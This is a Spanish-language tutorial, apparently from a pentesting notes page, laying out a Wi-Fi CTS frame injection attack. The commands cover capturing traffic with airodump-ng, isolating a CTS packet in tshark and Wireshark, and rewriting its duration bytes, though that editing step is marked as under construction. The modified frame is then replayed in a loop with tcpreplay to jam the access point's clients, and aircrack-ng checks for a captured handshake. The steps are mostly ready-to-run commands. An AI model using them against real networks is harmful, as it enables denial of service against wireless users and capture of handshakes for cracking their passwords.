CTS Frame Attack *
Ataque usado para la obtención de handshake. Se inyectan tramas CTS en la red para secuestrar el ancho de banda y forzar que los clientes se desasocien del AP, para posteriormente reautenticarse.
Capturar tráfico con Airodump-ng
sudo airodump-ng --write traffic_file --bssid <MAC_AP> --channel <channel_AP> <wifi_interface>
En paralelo, analizar con Tshark el fichero de tráfico capturado (puede filtrar por campo "wlan.duration" para ver transmisión en microsegundos de paquetes CTS)
tshark -r traffic_file.cap -Y "wlan.fc.type_subtype==28" -Tjson
tshark -r traffic_file.cap -Y "wlan.fc.type_subtype==28" -Tfields -e wlan.duration | sort -u
Abrir con Wireshark fichero de tráfico capturado
wireshark traffic_file.cap > /dev/null 2>&1 & && disown
Desde Wireshark, aplica filtro para paquetes CTS
wlan.fc.type_subtype==28
Seleccionar un solo paquete. Luego guardar desde ARCHIVO -> EXPORTAR PAQUETES ESPECIFICADOS
Asignar nuevo nombre al fichero: CTS-attack
Exportar como: Wireshark/tcpdump/... - pcap
Solo paquetes seleccionados
Darle a guardar y cerrar Wireshark

Abrir fichero CTS-attack.pcap con ghex
ghex CTS-attack.pcap > /dev/null 2>&1 & && disown
Convertir 30000 microsegundos a hexadecimal con bash (con espacio)
printf "%x\n" 30000 | awk '{ print substr($0, 3, 2), substr($0, 1, 2) }'
Convertir 30000 microsegundos a hexadecimal con bash (sin espacio)
printf "%x\n" 30000 | awk '{ printf "%s%s\n", substr($0, 3, 2), substr($0, 1, 2) }'
Modificar los bytes de tiempo originales por los creados y guardar el fichero modificado
EN CONTRUCCIÓN...
Abrir con Wireshark el fichero CTS-attack.pcap modificado para revisar los cambios
wireshark CTS_attack_frame_modificado.pcap > /dev/null 2>&1 & && disown
Inyectar el frame modificado en la red con TCPreplay para secuestrar el ancho de banda y generar un ataque de denegación de servicio a los clientes del AP.
tcpreplay --intf1=wlan0 --topspeed --loop=2000 CTS_attack_frame_modificado.pcap
Analizar presencia de handshake con Aircrack-ng en captura de tráfico
sudo aircrack-ng traffic_file.cap